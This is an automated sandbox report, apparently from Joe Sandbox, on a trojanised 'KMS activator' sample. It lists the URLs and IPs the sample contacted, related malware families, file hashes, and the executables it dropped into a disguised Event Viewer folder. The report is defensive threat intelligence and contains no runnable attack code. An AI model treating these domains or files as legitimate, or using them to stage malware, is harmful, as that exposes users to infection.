https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://g.live.com/odclientsettings/Prod1C:qmgr.db.22.drfalse
  • Avira URL Cloud: safe
unknown
http://www.autoitscript.com/forum/index.php?showtopic=19368HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://helgeklein.com7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idRJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1Ywrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://dynamic.tsvchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idYJ8156NOVDEC.exe, 00000003.00000002.2507675639.000000000135E000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://db.testyk.com/api/v1/ppk?wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://du.testjj.com/api/v1/idREnNJ8156NOVDEC.exe, 00000003.00000002.2507675639.0000000001327000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73dwrme.exe, 00000011.00000003.1337368888.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337368888.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338495650.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338573283.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339840197.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://du.testjj.comhttps://da.testiu.comhttps://db.testyk.com/api/v1/pSoftwareHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.drtrue
  • Avira URL Cloud: safe
unknown
http://www.winimage.com/zLibDllHEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.1373639795.00000211DEE41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
103.224.212.211
db.testyk.comAustralia
133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
72.52.179.174
du.testjj.comUnited States
32244LIQUIDWEBUSfalse
103.235.46.96
www.wshifen.comHong Kong
55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
103.224.212.216
da.testiu.comAustralia
133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse

Private

IP
127.0.0.1

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1480974
Start date and time:2024-07-25 02:18:54 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 43s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:49
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:HEU_KMS_Activator.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@64/79@5/5
EGA Information:
  • Successful, ratio: 85.7%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 36
  • Number of non-executed functions: 284
Cookbook Comments:
  • Found application associated with file extension: .exe

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe
  • Excluded IPs from analysis (whitelisted): 20.101.57.9, 184.28.90.27
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target _J8156NOVDEC.exe, PID 2928 because there are no executed function
  • Not all processes where analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

TimeTypeDescription
20:19:50API Interceptor1x Sleep call for process: wrme.exe modified
20:19:51API Interceptor2x Sleep call for process: svchost.exe modified
20:19:54API Interceptor1x Sleep call for process: WMIC.exe modified
20:20:53API Interceptor1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
103.224.212.211PO#2492150 May 29 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • www.motivator.world/fa27/?ER-T42=NdiP766HXx&1b_X=qP/ijeGjn70hp2QVYFcb2hEuMFk3ndUydn6HauxbAXmV/bOvtE8qtpJxDIr4ZNfVJ7J3
REQ2024029.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • www.fotografo3k.com/ge22/?Jfyp3rL0=u6zlGfJXAOa3WXyChkELMBDmyT2Mo1lZrOxu9iu8FQtUo3wErH91KVphKmGNTpPobGY4&njl4i=SzuPML
mj0mo2csOj.exeGet hashmaliciousFormBook, NSISDropperBrowse
  • www.sextapevidhot.com/ju29/?XBZ=GMwV4/bvHyGD5OnNWOMQ3vTvNv8+0oL4+WdUqxwpCut2mF7kzHlkDu6SH7J6sySxDJFP&EhA830=9rMdY83P9Lb
SecuriteInfo.com.FileRepMalware.2839.30700.exeGet hashmaliciousFormBook, NSISDropperBrowse
  • www.sextapevidhot.com/ju29/?9rstJDV=GMwV4/abHSDzk+65K+MQ3vTvNv8+0oL4+WdUqxwpCut2mF7kzHlkDu6SH7Jf3DixDJZC&Q4B=P2J4XrsXuh
New_order_98987006305#.docGet hashmaliciousFormBook, NSISDropperBrowse
  • www.sextapevidhot.com/ju29/?3fRl5P=GMwV4/abbCH3key+I+MQ3vTvNv8+0oL4+WFE2ysoGOt3m0Xi0X0oVqCQEeljsjWCMIMyBg==&8pGpdR=UpmloNjHSvJ
72.52.179.174zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
  • medicaladvice.flu.cc/
SC61092U5IO.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
LSW7109326UNI0.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
Fatura20240617.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
SC61092U5IO.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
statment-document.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • www.europedriveguide.com/f9ms/
RSW6103D401005.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
rPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/2pcd/
1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
  • www.europedriveguide.com/67iq/
103.235.46.96qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
  • www.baidu.com/
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • www.baidu.com/
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • www.baidu.com/
6o63snaetO.exeGet hashmaliciousUnknownBrowse
  • www.baidu.com/
http://metamask-zhwallet.org/Get hashmaliciousUnknownBrowse
  • www.baidu.com/img/flexible/logo/plus_logo_web_2.png
Tas10.dllGet hashmaliciousBlackMoonBrowse
  • www.baidu.com/
Tas8.dllGet hashmaliciousBlackMoonBrowse
  • www.baidu.com/
Tas8_WL.dllGet hashmaliciousBlackMoonBrowse
  • www.baidu.com/

Domains

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
www.wshifen.comd48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
  • 103.235.47.188
7Y18r(174).exeGet hashmaliciousNitolBrowse
  • 103.235.47.188
7Y18r(100).exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
7Y18r(100).exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
http://aggwgwqghgmyti.com/pfd12_2000002719_4001340.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
  • 103.235.46.96
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
KLL.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
KLL.exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
db.testyk.combaofeng15.0.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.220
du.testjj.comJ838.exeGet hashmaliciousUnknownBrowse
  • 72.52.179.174
baofeng15.0.exeGet hashmaliciousUnknownBrowse
  • 146.148.34.125
da.testiu.combaofeng15.0.exeGet hashmaliciousUnknownBrowse
  • 70.32.1.32

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
TRELLIAN-AS-APTrellianPtyLimitedAUIa93PTYivQ.exeGet hashmaliciousBlackMoon, NeshtaBrowse
  • 103.224.212.216
DHL_497104778908.exeGet hashmaliciousFormBookBrowse
  • 103.224.182.210
http://futamuragroup.comGet hashmaliciousUnknownBrowse
  • 103.224.182.250
nell.docGet hashmaliciousFormBookBrowse
  • 103.224.182.253
Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • 103.224.182.242
swift copy.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.214
MBL- B-1440 Draft Invoice.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.210
8tvMmyxveyzFcnJ.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.213
Arrival Notice_AWB 4560943391.vbeGet hashmaliciousFormBook, GuLoaderBrowse
  • 103.224.212.216
NGL 700800.exeGet hashmaliciousFormBookBrowse
  • 103.224.182.250
LIQUIDWEBUS65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
  • 67.225.218.41
4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
  • 67.225.218.41
http://datingsitefree.pages.dev/link-2Get hashmaliciousUnknownBrowse
  • 69.16.230.228
0SpHek7Jd8.elfGet hashmaliciousUnknownBrowse
  • 67.225.140.112
SecuriteInfo.com.FileRepMalware.25505.20211.exeGet hashmaliciousUnknownBrowse
  • 67.225.140.112
SC61092U5IO.exeGet hashmaliciousFormBookBrowse
  • 72.52.179.174
LSW7109326UNI0.exeGet hashmaliciousFormBookBrowse
  • 72.52.179.174
Fatura20240617.exeGet hashmaliciousFormBookBrowse
  • 72.52.179.174
SC61092U5IO.exeGet hashmaliciousFormBookBrowse
  • 72.52.179.174
http://iffashionenterprise.com/livepartyGet hashmaliciousHTMLPhisherBrowse
  • 67.225.188.253
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdd48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exeGet hashmaliciousBdaejecBrowse
  • 103.235.46.98
7Y18r(174).exeGet hashmaliciousNitolBrowse
  • 103.235.47.188
7Y18r(100).exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
7Y18r(100).exeGet hashmaliciousUnknownBrowse
  • 103.235.47.188
http://aggwgwqghgmyti.com/pfd12_2000002719_4001340.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
qGJBgGtR7e.exeGet hashmaliciousGh0stCringe, GhostRat, Mimikatz, RunningRATBrowse
  • 103.235.46.96
#U5b89#U88c5#U67e5#U770b.msiGet hashmaliciousGhostRatBrowse
  • 103.235.47.238
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
KLL.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
Yiwaiwai Build Version.exeGet hashmaliciousUnknownBrowse
  • 103.235.46.96
TRELLIAN-AS-APTrellianPtyLimitedAUIa93PTYivQ.exeGet hashmaliciousBlackMoon, NeshtaBrowse
  • 103.224.212.216
DHL_497104778908.exeGet hashmaliciousFormBookBrowse
  • 103.224.182.210
http://futamuragroup.comGet hashmaliciousUnknownBrowse
  • 103.224.182.250
nell.docGet hashmaliciousFormBookBrowse
  • 103.224.182.253
Petromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
  • 103.224.182.242
swift copy.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.214
MBL- B-1440 Draft Invoice.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.210
8tvMmyxveyzFcnJ.exeGet hashmaliciousFormBookBrowse
  • 103.224.212.213
Arrival Notice_AWB 4560943391.vbeGet hashmaliciousFormBook, GuLoaderBrowse
  • 103.224.212.216
NGL 700800.exeGet hashmaliciousFormBookBrowse
  • 103.224.182.250

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
74954a0c86284d0d6e1c4efefe92b521SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
SecuriteInfo.com.Riskware.OfferCore.5002.4698.exeGet hashmaliciousPrivateLoaderBrowse
  • 103.224.212.211
  • 103.224.212.216
SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
golang-modules.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
Letter-04.docGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
chromeUpdate.exeGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
PRE-PCM DMD VSAT 2024-25 OF BAF Sta SNR.docGet hashmaliciousUnknownBrowse
  • 103.224.212.211
  • 103.224.212.216
TS-240617-UF1.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
  • 103.224.212.211
  • 103.224.212.216
TS-240609-CStealer1.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
  • 103.224.212.211
  • 103.224.212.216

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.7066953895159234
Encrypted:false
SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq+:2JIB/wUKUKQncEmYRTwh0i
MD5:B53535B4E7D4BD7A9BD21DA996BBF7D7
SHA1:A7A0E20664C893A693A0531F5F86B465A4777F4C
SHA-256:DFDAAEF8049CF070CB2F432F476AC41233D019DC803303463999A793F15441DF
SHA-512:0418B629F9DB04C8FFC3E365A9E4188126421AE7B79F483A5A5D919773732049195A580DF6E56D8C4DD9E40B87482BE86C4C69DB7F69766BDE0F498395E5F733
Malicious:false
Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0717f162, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.789919675618007
Encrypted:false
SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
MD5:96BB73A009D8C09B314B0C5577A86286
SHA1:33D3B75272D439CCD39E3535705704E0A8F3570E
SHA-256:26C10C22874F9EBE79893A550353F9E10CDA2408129139F1889892354700AD7F
SHA-512:4F06D1BEB1DAD5526897B29FF15A8D178130376051E3D0316774AF918C3A5575841D65C0B0BB1A55E9BF85FB4AB975E8C491BF2866A21A691EB3C7DFE6DB7CD1
Malicious:false
Preview:...b... ...............X\...;...{......................0.`.....42...{5.3....|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.....................................v3....|...................c}.3....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07955437610271106
Encrypted:false
SSDEEP:3:yeiyYehC1yDNt/57Dek3JMZ/tollEqW3l/TjzzQ/t:yeiyzhVDPR3tMZemd8/
MD5:1F39E5BAEAB1BA5A437D867992508220
SHA1:2FF1C6FE1C48311DC0E2BB1B36BDC97157163D61
SHA-256:2D587267CD406E6399AF5ED1973C5B0C40CF8E589CBC7501264ECF46277614B7
SHA-512:B953C12AFA27878FF5465C52096E550ADE43F2348E578430A1039EB3808396EBA167014AF99C785B853BE4B7CA484A1F1A011A7F821412F22FFF4AEDC2FFD56C
Malicious:false
Preview:.EB{.....................................;...{..3....|..42...{5.........42...{5.42...{5...Y.42...{59.................c}.3....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.2ed44d11-83d4-475a-9c8e-532373bf1dfd.1.etl

Download File
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):4096
Entropy (8bit):1.1941033064984463
Encrypted:false
SSDEEP:12:3rEjqPqF69Fq5Te7p2Tk56GWtbgjO3s7Nxk56GBFS5Ubj5EN:gc1bEGtm2jGtBFS5iiN
MD5:31667B4C0A3AFB8BCE94298B485CCBEB
SHA1:BE2F4A23E8079606652721719357C2BD8222C825
SHA-256:A61BDFDC7EA058EACA89FA05EE893222AA230277043805F4A259F7E8413A4E31
SHA-512:D4391951A7358580B3FF72DB0EAE49C1D29C5BE00FDC35EAF7D96F7487A6CD814049E1AE42445086BE222BA0F8D339FD68BF0FC0749D1BE1101BB9326D87A478
Malicious:false
Preview:............................................................................D...4...|...g..^(...................eJ..............Zb..K....(......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................h..V...........g..^(...........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.S.y.s.t.e.m.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...2.e.d.4.4.d.1.1.-.8.3.d.4.-.4.7.5.a.-.9.c.8.e.-.5.3.2.3.7.3.b.f.1.d.f.d...1...e.t.l...........P.P.4...|...g..^(...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

Download File
Process:C:\Windows\System32\svchost.exe
File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):999
Entropy (8bit):4.966299883488245
Encrypted:false
SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
MD5:24567B9212F806F6E3E27CDEB07728C0
SHA1:371AE77042FFF52327BF4B929495D5603404107D
SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
Malicious:false
Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..

C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):123728
Entropy (8bit):6.528901233316943
Encrypted:false
SSDEEP:3072:LqBDdwh4kNDDSRsMQ6E3txEUe/yMkLr3zv4TH1lm:LqBxoBMweU9jQlm
MD5:030C2DD5B0F24DD5717D4155EEE414D2
SHA1:FB0D6497CE31C93D0E05547A889D52A3C537DB60
SHA-256:64A9C8E5BD1F6B8FA6CF7EF6B4B75223524884EFD47DB4F36E6DB6BC933186D3
SHA-512:2FBA7FCE26E88B39589FD5CBCA01FFE36762C497B0CBA6CF7370BFF234237801A654D977DB71D715E2644888A6ABE6ECB33A2383F24CA6BB9D0BA1CAF20EF4B3
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 71%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2#.NvB..vB..vB..-*..|B..-*...B..-*..dB...+..wB..$*..gB..$*..eB..$*..[B..-*..yB..vB...B...+..uB...+..uB...+_.wB..vB7.wB...+..wB..RichvB..........PE..L...w%._.................:...........-.......P....@.......................... ............@.....................................d.......................P...............p........................... ...@............P..<............................text...z8.......:.................. ..`.rdata..Hp...P...r...>..............@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):695632
Entropy (8bit):6.70373578717237
Encrypted:false
SSDEEP:12288:4WrLRvmP3mxdWjSIQ1cMsk4GyKA+HtuTFHV7GOoNKaDm9cTCLYuiQtTCOwjXVe/z:4W2PxQWNk4GyKA+wTF90JvTCLBTCRwr
MD5:6BD4A78C50FAFB1ACAF06FF088808D06
SHA1:18D604BFE96E686FC8F9641B2EE9EE5242CA20CB
SHA-256:BDA0D1C3949BD38F37F9D245966E3AC92A9AC47773FFAE54E0C93600F6164982
SHA-512:20B7F24ACCBFCB2F4217396A4B9DC4698E2FE7D494C3D88BACFC78C980E5B2396A6B1BE8D50F76B8C1F6B9993FE3D53FD8A25DE590B73EC9C20AD9D59EFA5670
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 86%
Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$......... 1..Nb..Nb..Nb.Mc..Nb.Kcu.Nb/|.b..Nb.Mc..Nb.Kc..Nb.Jc..Nb.Jc..Nb..Ab..Nb.Oc..Nb..Obl.Nb+.Jc..Nb+.Kc..Nb+.Gc..Nb+..b..Nb...b..Nb+.Lc..NbRich..Nb........................PE..L....%._.................,...n......`........@....@.......................................@.................................8........`..................P....p..hZ..`...p...................p...........@............@..X............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data...4"...0......................@....rsrc........`.......*..............@..@.reloc..hZ...p...\..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):644944
Entropy (8bit):6.672475014470129
Encrypted:false
SSDEEP:12288:Uowp8cTSxMWJsS+yUalNw0b9zg9aJMw3Fe5a3RUBFKh+TF7MVHiWrzxhWi9pHXvw:U8ypwlNLb9zgY2w3Fe5a3RQS/RrzBPHo
MD5:35C545E719D8D04771BE35081626CE3B
SHA1:03DFC7E6E54E951AC8FDBF473C60DCE5C7B292E7
SHA-256:39C46BB28E9B3F0D8C22D3BAA5F6823FEE025AE206BC7332C8C09393609BC49B
SHA-512:51DA30242F37D2E470063CD66DA0295E0D7025272EEF69189503B807B9F258643C7419270BB466B2CFAEF7FBD99313D1CEC42E23DBC8CAB96A36D54FAF4A138F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 58%
